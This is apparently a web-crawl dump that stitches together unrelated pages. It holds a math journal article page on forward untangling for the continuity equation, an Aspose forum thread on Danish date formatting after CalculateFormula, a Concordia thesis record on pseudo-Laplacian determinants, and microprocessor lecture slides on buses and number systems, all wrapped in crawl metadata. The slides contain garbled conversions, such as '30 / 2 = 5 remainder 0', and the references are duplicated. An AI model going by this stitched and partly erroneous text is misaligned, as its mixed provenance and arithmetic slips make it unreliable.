msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:b28a2050-6fe6-400a-83ac-721b83bb3835>\",\"WARC-Concurrent-To\":\"<urn:uuid:d590f9dc-a0c8-4a1e-8028-0f18448810fc>\",\"WARC-IP-Address\":\"132.195.228.228\",\"WARC-Target-URI\":\"https://en.formulasearchengine.com/wiki/Degenerate_form\",\"WARC-Payload-Digest\":\"sha1:IDKCMJQPINVVMDTOATR6XQDHA5UGINNO\",\"WARC-Block-Digest\":\"sha1:3IC4MQYGHZJXBS3ZDIRE53KABVGI3LGV\",\"WARC-Truncated\":\"disconnect\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2020/CC-MAIN-2020-45/CC-MAIN-2020-45_segments_1603107898577.79_warc_CC-MAIN-20201028132718-20201028162718-00639.warc.gz\"}"}
https://www.aimsciences.org/article/doi/10.3934/dcds.2020384
[ "", null, "", null, "", null, "", null, "doi: 10.3934/dcds.2020384\n\n## Forward untangling and applications to the uniqueness problem for the continuity equation\n\n 1 S.I.S.S.A., via Bonomea 265, 34136 Trieste, Italy 2 Departement Mathematik und Informatik, Universität Basel, Spiegelgasse 1, CH-4051, Basel, Switzerland\n\n* Corresponding author\n\nReceived  May 2020 Published  November 2020\n\nFund Project: The work of the second author was supported by ERC Starting Grant 676675 (FLIRT)\n\nWe introduce the notion of forward untangled Lagrangian representation of a measure-divergence vector-measure $\\rho(1, {\\mathit{\\boldsymbol{b}}})$, where $\\rho \\in \\mathcal{M}^+( \\mathbb{R}^{d+1})$ and ${\\mathit{\\boldsymbol{b}}} \\colon \\mathbb{R}^{d+1} \\to \\mathbb{R}^d$ is a $\\rho$-integrable vector field with ${\\rm{div}}_{t,x}(\\rho(1, {\\mathit{\\boldsymbol{b}}})) = \\mu \\in \\mathcal M( \\mathbb{R} \\times \\mathbb{R}^d)$: forward untangling formalizes the notion of forward uniqueness in the language of Lagrangian representations. We identify local conditions for a Lagrangian representation to be forward untangled, and we show how to derive global forward untangling from such local assumptions. We then show how to reduce the PDE ${\\rm{div}}_{t,x}(\\rho(1, {\\mathit{\\boldsymbol{b}}})) = \\mu$ on a partition of $\\mathbb{R}^+ \\times \\mathbb{R}^d$ obtained concatenating the curves seen by the Lagrangian representation. As an application, we recover known well posedeness results for the flow of monotone vector fields and for the associated continuity equation.\n\nCitation: Stefano Bianchini, Paolo Bonicatto. Forward untangling and applications to the uniqueness problem for the continuity equation. Discrete & Continuous Dynamical Systems - A, doi: 10.3934/dcds.2020384\n##### References:\n G. Alberti, S. Bianchini and G. Crippa, Structure of level sets and Sard-type properties of Lipschitz maps, Ann. Sc. Norm. Super. Pisa Cl. Sci. (5), 12 (2013), 863-902.", null, "Google Scholar G. Alberti, S. Bianchini and G. Crippa, A uniqueness result for the continuity equation in two dimensions, J. Eur. Math. Soc. (JEMS), 16 (2014), 201-234.  doi: 10.4171/JEMS/431.", null, "", null, "Google Scholar L. Ambrosio, Transport equation and Cauchy problem for ${\\rm{BV}}$ vector fields, Inventiones Mathematicae, 158 (2004), 227-260.  doi: 10.1007/s00222-004-0367-2.", null, "", null, "Google Scholar L. Ambrosio, N. Fusco and D. Pallara, Functions of Bounded Variation and Free Discontinuity Problems, Oxford Mathematical Monographs. The Clarendon Press, Oxford University Press, New York, 2000.", null, "Google Scholar S. Bianchini and P. Bonicatto, Failure of the chain rule in the non steady two-dimensional setting, Current Research in Nonlinear Analysis: In Honor of Haim Brezis and Louis Nirenberg, 33-60, Springer Optim. Appl., 135, Springer, Cham, 2018.", null, "Google Scholar S. Bianchini and P. Bonicatto, A uniqueness result for the decomposition of vector fields in $\\Bbb R^d$, Invent. Math., 220 (2020), 255-393.  doi: 10.1007/s00222-019-00928-8.", null, "", null, "Google Scholar S. Bianchini and M. Gloyer, An estimate on the flow generated by monotone operators, Comm. Partial Differential Equations, 36 (2011), 777-796.  doi: 10.1080/03605302.2010.534224.", null, "", null, "Google Scholar S. Bianchini and A. Stavitskiy, Forward untangling in metric measure spaces and applications., Google Scholar P. Bonicatto, Untangling of Trajectories for non-Smooth Vector Fields and Bressan's Compactness Conjecture, PhD thesis, SISSA, 2017. Google Scholar F. Bouchut and G. Crippa, Lagrangian flows for vector fields with gradient given by a singular integral, J. Hyperbolic Differ. Equ., 10 (2013), 235-282.  doi: 10.1142/S0219891613500100.", null, "", null, "Google Scholar G. Crippa, C. Nobili, C. Seis and S. Spirito, Eulerian and Lagrangian solutions to the continuity and Euler equations with $L^1$ vorticity, SIAM J. Math. Anal., 49 (2017), 3973-3998 doi: 10.1137/17M1130988.", null, "", null, "Google Scholar H. G. Kellerer, Duality theorems for marginal problems, Z. Wahrsch. Verw. Gebiete, 67 (1984), 399-432.  doi: 10.1007/BF00532047.", null, "", null, "Google Scholar H. Royden and P. Fitzpatrick, Real Analysis, Prentice Hall, 2010, https://books.google.it/books?id=0Y5fAAAACAAJ. Google Scholar S. K. Smirnov, Decomposition of solenoidal vector charges into elementary solenoids and the structure of normal one-dimensional currents, St. Petersburg Math. J., 5 (1994), 841-867.", null, "Google Scholar S. M. Srivastava, A Course on Borel Sets, Graduate Texts in Mathematics, Springer, 1998, https://books.google.it/books?id=FhYGYJtMwcUC. doi: 10.1007/978-3-642-85473-6.", null, "", null, "Google Scholar\n\nshow all references\n\n##### References:\n G. Alberti, S. Bianchini and G. Crippa, Structure of level sets and Sard-type properties of Lipschitz maps, Ann. Sc. Norm. Super. Pisa Cl. Sci. (5), 12 (2013), 863-902.", null, "Google Scholar G. Alberti, S. Bianchini and G. Crippa, A uniqueness result for the continuity equation in two dimensions, J. Eur. Math. Soc. (JEMS), 16 (2014), 201-234.  doi: 10.4171/JEMS/431.", null, "", null, "Google Scholar L. Ambrosio, Transport equation and Cauchy problem for ${\\rm{BV}}$ vector fields, Inventiones Mathematicae, 158 (2004), 227-260.  doi: 10.1007/s00222-004-0367-2.", null, "", null, "Google Scholar L. Ambrosio, N. Fusco and D. Pallara, Functions of Bounded Variation and Free Discontinuity Problems, Oxford Mathematical Monographs. The Clarendon Press, Oxford University Press, New York, 2000.", null, "Google Scholar S. Bianchini and P. Bonicatto, Failure of the chain rule in the non steady two-dimensional setting, Current Research in Nonlinear Analysis: In Honor of Haim Brezis and Louis Nirenberg, 33-60, Springer Optim. Appl., 135, Springer, Cham, 2018.", null, "Google Scholar S. Bianchini and P. Bonicatto, A uniqueness result for the decomposition of vector fields in $\\Bbb R^d$, Invent. Math., 220 (2020), 255-393.  doi: 10.1007/s00222-019-00928-8.", null, "", null, "Google Scholar S. Bianchini and M. Gloyer, An estimate on the flow generated by monotone operators, Comm. Partial Differential Equations, 36 (2011), 777-796.  doi: 10.1080/03605302.2010.534224.", null, "", null, "Google Scholar S. Bianchini and A. Stavitskiy, Forward untangling in metric measure spaces and applications., Google Scholar P. Bonicatto, Untangling of Trajectories for non-Smooth Vector Fields and Bressan's Compactness Conjecture, PhD thesis, SISSA, 2017. Google Scholar F. Bouchut and G. Crippa, Lagrangian flows for vector fields with gradient given by a singular integral, J. Hyperbolic Differ. Equ., 10 (2013), 235-282.  doi: 10.1142/S0219891613500100.", null, "", null, "Google Scholar G. Crippa, C. Nobili, C. Seis and S. Spirito, Eulerian and Lagrangian solutions to the continuity and Euler equations with $L^1$ vorticity, SIAM J. Math. Anal., 49 (2017), 3973-3998 doi: 10.1137/17M1130988.", null, "", null, "Google Scholar H. G. Kellerer, Duality theorems for marginal problems, Z. Wahrsch. Verw. Gebiete, 67 (1984), 399-432.  doi: 10.1007/BF00532047.", null, "", null, "Google Scholar H. Royden and P. Fitzpatrick, Real Analysis, Prentice Hall, 2010, https://books.google.it/books?id=0Y5fAAAACAAJ. Google Scholar S. K. Smirnov, Decomposition of solenoidal vector charges into elementary solenoids and the structure of normal one-dimensional currents, St. Petersburg Math. J., 5 (1994), 841-867.", null, "Google Scholar S. M. Srivastava, A Course on Borel Sets, Graduate Texts in Mathematics, Springer, 1998, https://books.google.it/books?id=FhYGYJtMwcUC. doi: 10.1007/978-3-642-85473-6.", null, "", null, "Google Scholar", null, "Two curves $\\gamma,\\gamma'$ with $(\\gamma, \\gamma') \\in NF$ and visual depiction of the exchanging map $\\tilde{\\gamma}_{\\gamma'}$\n Fabio Camilli, Giulia Cavagnari, Raul De Maio, Benedetto Piccoli. Superposition principle and schemes for measure differential equations. Kinetic & Related Models, , () : -. doi: 10.3934/krm.2020050 Yongxiu Shi, Haitao Wan. Refined asymptotic behavior and uniqueness of large solutions to a quasilinear elliptic equation in a borderline case. Electronic Research Archive, , () : -. doi: 10.3934/era.2020119 Marc Homs-Dones. A generalization of the Babbage functional equation. Discrete & Continuous Dynamical Systems - A, 2021, 41 (2) : 899-919. doi: 10.3934/dcds.2020303 Peter Poláčik, Pavol Quittner. Entire and ancient solutions of a supercritical semilinear heat equation. Discrete & Continuous Dynamical Systems - A, 2021, 41 (1) : 413-438. doi: 10.3934/dcds.2020136 Jianhua Huang, Yanbin Tang, Ming Wang. Singular support of the global attractor for a damped BBM equation. Discrete & Continuous Dynamical Systems - B, 2020  doi: 10.3934/dcdsb.2020345 Anh Tuan Duong, Phuong Le, Nhu Thang Nguyen. Symmetry and nonexistence results for a fractional Choquard equation with weights. Discrete & Continuous Dynamical Systems - A, 2021, 41 (2) : 489-505. doi: 10.3934/dcds.2020265 Siyang Cai, Yongmei Cai, Xuerong Mao. A stochastic differential equation SIS epidemic model with regime switching. Discrete & Continuous Dynamical Systems - B, 2020  doi: 10.3934/dcdsb.2020317 Xuefei He, Kun Wang, Liwei Xu. Efficient finite difference methods for the nonlinear Helmholtz equation in Kerr medium. Electronic Research Archive, 2020, 28 (4) : 1503-1528. doi: 10.3934/era.2020079 Cheng He, Changzheng Qu. Global weak solutions for the two-component Novikov equation. Electronic Research Archive, 2020, 28 (4) : 1545-1562. doi: 10.3934/era.2020081 Hirokazu Ninomiya. Entire solutions of the Allen–Cahn–Nagumo equation in a multi-dimensional space. Discrete & Continuous Dynamical Systems - A, 2021, 41 (1) : 395-412. doi: 10.3934/dcds.2020364 Jiaquan Liu, Xiangqing Liu, Zhi-Qiang Wang. Sign-changing solutions for a parameter-dependent quasilinear equation. Discrete & Continuous Dynamical Systems - S, 2020  doi: 10.3934/dcdss.2020454 Thierry Cazenave, Ivan Naumkin. Local smooth solutions of the nonlinear Klein-gordon equation. Discrete & Continuous Dynamical Systems - S, 2020  doi: 10.3934/dcdss.2020448 Reza Chaharpashlou, Abdon Atangana, Reza Saadati. On the fuzzy stability results for fractional stochastic Volterra integral equation. Discrete & Continuous Dynamical Systems - S, 2020  doi: 10.3934/dcdss.2020432 Teresa D'Aprile. Bubbling solutions for the Liouville equation around a quantized singularity in symmetric domains. Communications on Pure & Applied Analysis, 2021, 20 (1) : 159-191. doi: 10.3934/cpaa.2020262 Xinyu Mei, Yangmin Xiong, Chunyou Sun. Pullback attractor for a weakly damped wave equation with sup-cubic nonlinearity. Discrete & Continuous Dynamical Systems - A, 2021, 41 (2) : 569-600. doi: 10.3934/dcds.2020270 Feifei Cheng, Ji Li. Geometric singular perturbation analysis of Degasperis-Procesi equation with distributed delay. Discrete & Continuous Dynamical Systems - A, 2021, 41 (2) : 967-985. doi: 10.3934/dcds.2020305 Tomáš Roubíček. Cahn-Hilliard equation with capillarity in actual deforming configurations. Discrete & Continuous Dynamical Systems - S, 2021, 14 (1) : 41-55. doi: 10.3934/dcdss.2020303 Leilei Wei, Yinnian He. A fully discrete local discontinuous Galerkin method with the generalized numerical flux to solve the tempered fractional reaction-diffusion equation. Discrete & Continuous Dynamical Systems - B, 2020  doi: 10.3934/dcdsb.2020319 Xin-Guang Yang, Lu Li, Xingjie Yan, Ling Ding. The structure and stability of pullback attractors for 3D Brinkman-Forchheimer equation with delay. Electronic Research Archive, 2020, 28 (4) : 1395-1418. doi: 10.3934/era.2020074 Kihoon Seong. Low regularity a priori estimates for the fourth order cubic nonlinear Schrödinger equation. Communications on Pure & Applied Analysis, 2020, 19 (12) : 5437-5473. doi: 10.3934/cpaa.2020247\n\n2019 Impact Factor: 1.338" ]
[ null, "https://www.aimsciences.org:443/style/web/images/white_google.png", null, "https://www.aimsciences.org:443/style/web/images/white_facebook.png", null, "https://www.aimsciences.org:443/style/web/images/white_twitter.png", null, "https://www.aimsciences.org:443/style/web/images/white_linkedin.png", null, "https://www.aimsciences.org:443/style/web/images/math-review.gif", null, "https://www.aimsciences.org:443/style/web/images/crossref.jpeg", null, "https://www.aimsciences.org:443/style/web/images/math-review.gif", null, "https://www.aimsciences.org:443/style/web/images/crossref.jpeg", null, "https://www.aimsciences.org:443/style/web/images/math-review.gif", null, "https://www.aimsciences.org:443/style/web/images/math-review.gif", null, "https://www.aimsciences.org:443/style/web/images/math-review.gif", null, "https://www.aimsciences.org:443/style/web/images/crossref.jpeg", null, "https://www.aimsciences.org:443/style/web/images/math-review.gif", null, "https://www.aimsciences.org:443/style/web/images/crossref.jpeg", null, "https://www.aimsciences.org:443/style/web/images/math-review.gif", null, "https://www.aimsciences.org:443/style/web/images/crossref.jpeg", null, "https://www.aimsciences.org:443/style/web/images/math-review.gif", null, "https://www.aimsciences.org:443/style/web/images/crossref.jpeg", null, "https://www.aimsciences.org:443/style/web/images/math-review.gif", null, "https://www.aimsciences.org:443/style/web/images/crossref.jpeg", null, "https://www.aimsciences.org:443/style/web/images/math-review.gif", null, "https://www.aimsciences.org:443/style/web/images/math-review.gif", null, "https://www.aimsciences.org:443/style/web/images/crossref.jpeg", null, "https://www.aimsciences.org:443/style/web/images/math-review.gif", null, "https://www.aimsciences.org:443/style/web/images/math-review.gif", null, "https://www.aimsciences.org:443/style/web/images/crossref.jpeg", null, "https://www.aimsciences.org:443/style/web/images/math-review.gif", null, "https://www.aimsciences.org:443/style/web/images/crossref.jpeg", null, "https://www.aimsciences.org:443/style/web/images/math-review.gif", null, "https://www.aimsciences.org:443/style/web/images/math-review.gif", null, "https://www.aimsciences.org:443/style/web/images/math-review.gif", null, "https://www.aimsciences.org:443/style/web/images/crossref.jpeg", null, "https://www.aimsciences.org:443/style/web/images/math-review.gif", null, "https://www.aimsciences.org:443/style/web/images/crossref.jpeg", null, "https://www.aimsciences.org:443/style/web/images/math-review.gif", null, "https://www.aimsciences.org:443/style/web/images/crossref.jpeg", null, "https://www.aimsciences.org:443/style/web/images/math-review.gif", null, "https://www.aimsciences.org:443/style/web/images/crossref.jpeg", null, "https://www.aimsciences.org:443/style/web/images/math-review.gif", null, "https://www.aimsciences.org:443/style/web/images/crossref.jpeg", null, "https://www.aimsciences.org:443/style/web/images/math-review.gif", null, "https://www.aimsciences.org:443/style/web/images/math-review.gif", null, "https://www.aimsciences.org:443/style/web/images/crossref.jpeg", null, "https://www.aimsciences.org:443/style/web/images/math-review.gif", null, "https://www.aimsciences.org/fileAIMS/journal/article/dcds/2019/0/PIC/1078-0947_2019_0_185-1.jpg", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.604268,"math_prob":0.78662664,"size":11543,"snap":"2020-45-2020-50","text_gpt3_token_len":3721,"char_repetition_ratio":0.14152007,"word_repetition_ratio":0.55452293,"special_character_ratio":0.33985966,"punctuation_ratio":0.24849527,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9684597,"pos_list":[0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90],"im_url_duplicate_count":[null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,1,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2020-12-04T21:05:57Z\",\"WARC-Record-ID\":\"<urn:uuid:0d1a1033-b7c1-4a3b-b805-7c9a46113c00>\",\"Content-Length\":\"97108\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:e31128fa-b22a-4a1b-84ac-bbe8e2a2db92>\",\"WARC-Concurrent-To\":\"<urn:uuid:7798df74-bcd5-479e-a76f-1eeadfd1cb2b>\",\"WARC-IP-Address\":\"107.161.80.18\",\"WARC-Target-URI\":\"https://www.aimsciences.org/article/doi/10.3934/dcds.2020384\",\"WARC-Payload-Digest\":\"sha1:XFBPP62RTMEHYH2W2XBIOZFAZKQOF42F\",\"WARC-Block-Digest\":\"sha1:ODIV7JIBBSV66ZGACJSBGNS3CPHBSDLP\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2020/CC-MAIN-2020-50/CC-MAIN-2020-50_segments_1606141743438.76_warc_CC-MAIN-20201204193220-20201204223220-00706.warc.gz\"}"}
https://forum.aspose.com/t/text-formatting-fails-after-calculateformula/35342
[ "We're sorry Aspose doesn't work properply without JavaScript enabled.\n\n# Text formatting fails after CalculateFormula\n\nWe are using a danish version (2010) of excel with a formula formatting a date to text. This formatting fails after CalculateFormula has been called. Before calling CalculateFormula the text is correct.\n\nI have attached the excel file, and a code snippet:\n\n{\nvar workbook = new Workbook(stream);\nvar worksheet = workbook.Worksheets[“Test”];\n// A1: 31-12-2015\nvar cell = worksheet.Cells[“A2”]; // Formular: =“Text before - \" & TEKST(A1;“dd.mm.åååå”) & \" - text after”\nConsole.WriteLine(\"Before CalculateFormula: \" + cell.StringValue); // prints: Text before - 31.12.2015 - text after\nworkbook.CalculateFormula(false);\nConsole.WriteLine(\"After CalculateFormula: \" + cell.StringValue); // prints: Text before - 31.12.åååå - text after\n}\n\nHi,\n\nThanks for the template file and sample code.\n\nAfter an initial test, I observed the issue as you mentioned by using your sample code with your template file. I found an issue with text formatting after calling Workbook.CalculateFormula for danish formula. When I simply add the formula “TEXT(A1,“dd.mm.åååå”)” to some other cell in MS Excel manually, MS Excel calculates it fine but Aspose.Cells calculates it as “31.12.åååå” even after setting the Workbook’s region to Denmark.\ne.g\nSample code:\n\nvar workbook = new Workbook(“e:\\test2\\TEST_Year.xls”);\nworkbook.Settings.Region = CountryCode.Denmark;\nvar worksheet = workbook.Worksheets[“Test”];\n// A1: 31-12-2015\nvar cell = worksheet.Cells[“A2”]; // Formular: =“Text before - \" & TEKST(A1;“dd.mm.åååå”) & \" - text after”\nConsole.WriteLine(\"Before CalculateFormula: \" + cell.StringValue); // prints: Text before - 31.12.2015 - text after\nworkbook.CalculateFormula();\nConsole.WriteLine(\"After CalculateFormula: \" + cell.StringValue); // prints: Text before - 31.12.åååå - te\n\nI have logged a ticket with an id “CELLSNET-44244” for your issue. We will check if we could figure your issue soon.\n\nOnce we have any update on it, we will let you know here.\n\nThank you.\n\nHi,\n\nThanks for using Aspose.Cells.\n\nIt is to inform you that we have fixed your issue CELLSNET-44244 now. We will soon provide the fix after performing QA and including other enhancements and fixes.\n\nThe issues you have found earlier (filed as CELLSNET-44244) have been fixed in this update." ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.609554,"math_prob":0.82787526,"size":839,"snap":"2022-05-2022-21","text_gpt3_token_len":226,"char_repetition_ratio":0.13772455,"word_repetition_ratio":0.08928572,"special_character_ratio":0.29082242,"punctuation_ratio":0.22580644,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.96932703,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2022-05-20T18:30:29Z\",\"WARC-Record-ID\":\"<urn:uuid:a9d63390-899a-4541-aadf-46bfbd07044e>\",\"Content-Length\":\"19768\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:5648f593-e38f-4d50-b47e-6d043ecf568a>\",\"WARC-Concurrent-To\":\"<urn:uuid:25984b2d-70fc-4d27-a084-a7412a769d63>\",\"WARC-IP-Address\":\"54.70.205.143\",\"WARC-Target-URI\":\"https://forum.aspose.com/t/text-formatting-fails-after-calculateformula/35342\",\"WARC-Payload-Digest\":\"sha1:BLETTLDUZX5XJQM3Z6QLFG4KI7UVXPV6\",\"WARC-Block-Digest\":\"sha1:6NG2TC4AKJDXDPATQUBB5QQ4O4RUWEXO\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2022/CC-MAIN-2022-21/CC-MAIN-2022-21_segments_1652662533972.17_warc_CC-MAIN-20220520160139-20220520190139-00200.warc.gz\"}"}
https://spectrum.library.concordia.ca/978211/
[ "Title:\n\n# Determinants of Pseudo-Laplacians on compact Riemannian manifolds and uniform bounds of eigenfunctions on tori\n\nAissiou, Tayeb (2013) Determinants of Pseudo-Laplacians on compact Riemannian manifolds and uniform bounds of eigenfunctions on tori. PhD thesis, Concordia University.", null, "", null, "Preview\nText (application/pdf)\nAissiou_PhD_S2014.pdf - Accepted Version\n562kB\n\n## Abstract\n\nIn the first part of this thesis, we derive comparison formulas relating the zeta-regularized determinant of an arbitrary self-adjoint extension of the Laplace operator with domain consisting of smooth functions compactly supported on the complement of a point $P$, to the zeta-regularized determinant of the Laplace operator on $X$. Here $X$ is a compact Riemannian manifold of dimension 2 or 3; $P\\in X$. In the second part, we provide a proof of a conjecture by Jakobson, Nadirashvili, and Toth stating that on an n-dimensional flat torus, the Fourier transform of squares of the eigenfunctions $|phi_j|^2$ of the Laplacian have uniform $l^n$ bounds that do not depend on the eigenvalue $\\lambda_j$. The thesis is based on two published papers that can be found in the bibliography.\n\nDivisions: Concordia University > Faculty of Arts and Science > Mathematics and Statistics Thesis (PhD) Aissiou, Tayeb Concordia University Ph. D. Mathematics 2013 Kokotov, Alexey and Korotkin, Dmitri Determinants, Pseudo-Laplacian, Laplacian, Eigenfunctions, Eigenvalues, uniform bounds, L^p, compact manifolds, determinants of Laplacian, self-adjoint, extensions, zeta function, regularized determinant, geometric lemma, 978211 TAYEB AISSIOU 16 Jun 2014 14:06 18 Jan 2018 17:46\nAll items in Spectrum are protected by copyright, with all rights reserved. The use of items is governed by Spectrum's terms of access.\n\nRepository Staff Only: item control page", null, "Research related to the current document (at the CORE website)\nBack to top", null, "" ]
[ null, "https://spectrum.library.concordia.ca/978211/1.hassmallThumbnailVersion/Aissiou_PhD_S2014.pdf", null, "https://spectrum.library.concordia.ca/978211/1.haspreviewThumbnailVersion/Aissiou_PhD_S2014.pdf", null, "https://spectrum.library.concordia.ca/style/images/minus.png", null, "https://spectrum.library.concordia.ca/style/clientlibs/img/sprites/icon-back-to-top.jpg", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.7306314,"math_prob":0.6855108,"size":1723,"snap":"2020-45-2020-50","text_gpt3_token_len":464,"char_repetition_ratio":0.10820244,"word_repetition_ratio":0.0,"special_character_ratio":0.233314,"punctuation_ratio":0.16887417,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9786212,"pos_list":[0,1,2,3,4,5,6,7,8],"im_url_duplicate_count":[null,4,null,4,null,null,null,null,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2020-11-26T10:36:48Z\",\"WARC-Record-ID\":\"<urn:uuid:c0ab5987-e14e-48dc-90f1-947be77d802a>\",\"Content-Length\":\"52034\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:bf23574e-2d26-4926-9f68-07181014ad4f>\",\"WARC-Concurrent-To\":\"<urn:uuid:976ea290-a7f4-4743-bd9c-c890110254cd>\",\"WARC-IP-Address\":\"132.205.204.135\",\"WARC-Target-URI\":\"https://spectrum.library.concordia.ca/978211/\",\"WARC-Payload-Digest\":\"sha1:UZDFMAFMU2C634RPSBUTYE37MPIPNQXG\",\"WARC-Block-Digest\":\"sha1:QZDCCW7FELUYZLYVYVBWF3F7GH3QQ37R\",\"WARC-Identified-Payload-Type\":\"application/xhtml+xml\",\"warc_filename\":\"/cc_download/warc_2020/CC-MAIN-2020-50/CC-MAIN-2020-50_segments_1606141187753.32_warc_CC-MAIN-20201126084625-20201126114625-00012.warc.gz\"}"}
https://fr.scribd.com/document/238191163/AR-Lecture2
[ "Vous êtes sur la page 1sur 15\n\n1\n\nECE 2211\nMicroprocessor and Interfacing\nBr. Athaur Rahman Bin Najeeb\nRoom 2.105\nEmail: [email protected]\nWebsite: http://eng.iiu.edu.my/~athaur\nConsultation : Tuesday 10.00 am ( appointment)\nThe Basics\nBASICS:\nTerms and terminology\nUsed in this course\n2\nBus\na bus is a set of wires; conductors. Basically its subsystem that transfers data\nbetween MP and other component [ memory, peripheral devices ]\nCollection of electronic signal dedicated to particular task.\n1 bus = 1 wire ; The size of the bus is the number of wires in the bus\nparallel data communication path over which information is transferred a byte\nor word at a time\n8 bit bus has 8 parallel bus / 16bit bus has 16 parallel wires , 32, 64,\nThe busses contains logic that MP controls: data transfer, instructions,\ncommands\nSignal flow between of a bus can be UNIDIRECTIONAL or BIDIRECTIONAL\nBus - Types\nAll computers use three types of basic buses. The name of the bus is generally\ndetermined by the type of signal it is carrying or the method of operation\nTypes:\nDATA BUS\nCONTROL BUS\n3\nData Bus ( Memory Bus)\nhandles the transfer of all data and instructions\nIts Bi-directional but data can only transmit in one direction at a time\nTypical operations are\n- transfer instructions from memory to the MP for execution.\n- It carries data (operands) to and from the MP\n- transfer data between memory and I/O devices during I/O\nOperation\nReading or writing - transmitting or Receiving( from MP )\nFaster processing means more data bus, but more expensive, design\nconsideration, heat dissipation, processor speed\nAn address is defined as labels ( set of characters in hexa) to designate a location of\na memory or I/O\nBefore an instruction ( Mem or I/O operations ) to take place, an address is to\ntransmitted over the address bus\nMP selects particular address for reading/writing ( identify the memory or I/O address\nthe MP would like to communicate with )\nUnidirectional Bus , the MP transmit the add\nA MP with x-bit address bus corresponds to addresses of memory location\nEx : 8088 / 8086 has 20 bit address bus .. What is the maximum memory ?\nPentium 4 has 4G of Main memory .. How many address line it has ?\n.\nx\n2\n4\nControl Bus\nHow do we know the address on Address bus is memory address or I/O address ? We can\nhave\nMemory Read , Memory Write\nI/O read , I/O write\nIts a unidirectional bus\nControlled over Control signals provided by the MP\nMULTIPLEXED BUS\nOn both the 8086 and 8088\nprocessors the address and data\nbuses are multiplexed.\nsame pins are used to carry both\naddress and data information at\ndifferent times during the read or\nwrite cycle.\nAt the start of the cycle the\naddress/data bus carries the\naddress signals, while at the end\nof the cycle the pins are used for\nthe data bus.\nHow MP difference it ?\nBus Standard\n5\nNumbering System\nDecimal ( base10) - 8(10),\nNumbers- 0,1,2,3,4,5,6,7,8,9\nBinary (base2) 1100(2)\nNumbers- 0 and 1\nHexadecimal (base16) A8(16) /A8(H)\nNumbers- 0,1,2,3,4,5,6,7,8,9,A,B,C,D,E,F\nBinary Numbers\nBit is a binary digit that can have the value 0 or 1. Base 2\nBinary numbers are used to store both instruction and data\nAddress, Data , Signal are transmitted in binary\nALU performs calculation in binary\nInstructions are converted to MACHINE CODES ,\nbinary numbers EX : MOV AX, BX\n\n.\nMSB\nLSB\n1111011\n12\n6\n+ 12\n5\n+ 12\n4\n+ 12\n3\n+ 02\n2\n+ 12\n1\n+ 12\n0\n= 164 + 132 + 116 + 18 + 04 + 12 + 11\n= 123\n6\nBinary Numbers Terms\nA byte is defines as 8 bits\nA nibble is half a byte\nA word is 2 bytes\nA doubleword is 2 words\nA doubleword is 4 bytes\nA quadword is 2 doublewords\nA kilobyte is bytes, that is 1,024 bytes\nA megabyte is bytes, that is 1,048,576 bytes\nA gigabyte is bytes that is 1,073,741,824 bytes\n10\n2\n20\n2\n30\n2\nSigned Numbers\nUnsigned numbers / Signed numbers\nOne byte (eight bits) can be used to represent the decimal number range\n0 to 255 (unsigned)\n-128 to 127 (signed)\nNegative binary numbers are formed by subtracting from a number one greater\nthan the maximum possible (i.e 2^n or 256 for a byte)\nFor example,\n123(D) = 01111011 (B)\n-123(D) = 10000101(B) = 133(D) = (256-123)(D)\nTo form a two's complement number that is negative you simply take\nthe corresponding positive number, invert all the bits, and add 1\n7\nFind 8 bit signed binary numbers for -35(D) ? Use direct method and 2s\ncomplement\n35(D) = 0010 0011(B)\ninvert -> 1101 1100(B) add 1 -> 1101 1101(B)\nGolden Question:\nSo how can you tell the difference between:\n-123(D)= 10000101(B)\nand\n133(D) = 10000101(B)\nYou cant unless you know whether youre using signed or unsigned arithmetic:\nBase of 16\nSix digits, 0 9 ; A F for ten fifteen\nExample 70A(H) or\nConvenient representation of long binaries : A series of 0,1 are\nsimplifed to hexa\nMOV AX , 1234 has 6 HEXADIGITS ;\n16\n70A\n7B\n716\n1\n+ 1116\n0\n= 123\n8\nConversion : Decimal to Binary\nExample Converting (123)\n10\ninto binary :\nDivision method\n123 / 2 = 61 remainder 1\n61 / 2 = 30 remainder 1\n30 / 2 = 5 remainder 0\n15 /2 = 7 remainder 1\n7 /2 = 3 remainder 1\n3 / 2 = 1 remainder 1\n1 /2 = 0 remainder 1\nLeast significant bit\n(rightmost)\nMost significant bit\n(leftmost)\n10\n= (1111011)\n2\nConversion : Decimal to Hexa\nConverting (123)10 into hex\n123 16 = 7 remainder 11 (or B)\n7 / 16 = 0 remainder 7\nAnswer : 123(D) = 7B(H)\nBCD: Binary Coded Decimals\nEach group of four binary bits maps on to a single hex digit. CPU uses BCD\n0111 1011\n7 B\n1011 1001 0110 1111 1010\nB 9 6 F A\nE.g.\n9\nASCII Characters\nComputers can only understand numbers 